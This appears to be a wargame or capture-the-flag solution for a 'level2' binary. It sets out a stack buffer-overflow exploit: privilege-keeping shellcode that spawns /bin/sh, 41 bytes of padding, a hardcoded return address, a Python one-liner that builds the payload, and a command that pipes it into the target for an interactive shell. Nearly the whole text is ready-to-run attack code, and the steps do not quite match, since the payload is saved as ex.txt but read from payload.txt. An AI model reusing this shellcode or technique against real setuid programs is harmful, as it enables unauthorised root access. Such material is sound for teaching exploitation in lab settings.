*** LEVEL2 SOLUTION ***
*** Please note all text inside back-ticks (``) are commands.
*** Enter these command on the command line.

** return address = 0x804a080
** shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0"
               "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
** Filling up buffer = "A" * 41


# Setting up exploit line
  * So far we have:

python -c 'print "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" + "A" * 41 + "\x08\xa0\x04\x08"' > ex.txt

`(cat payload.txt; cat) | /home/user/level2/level2`
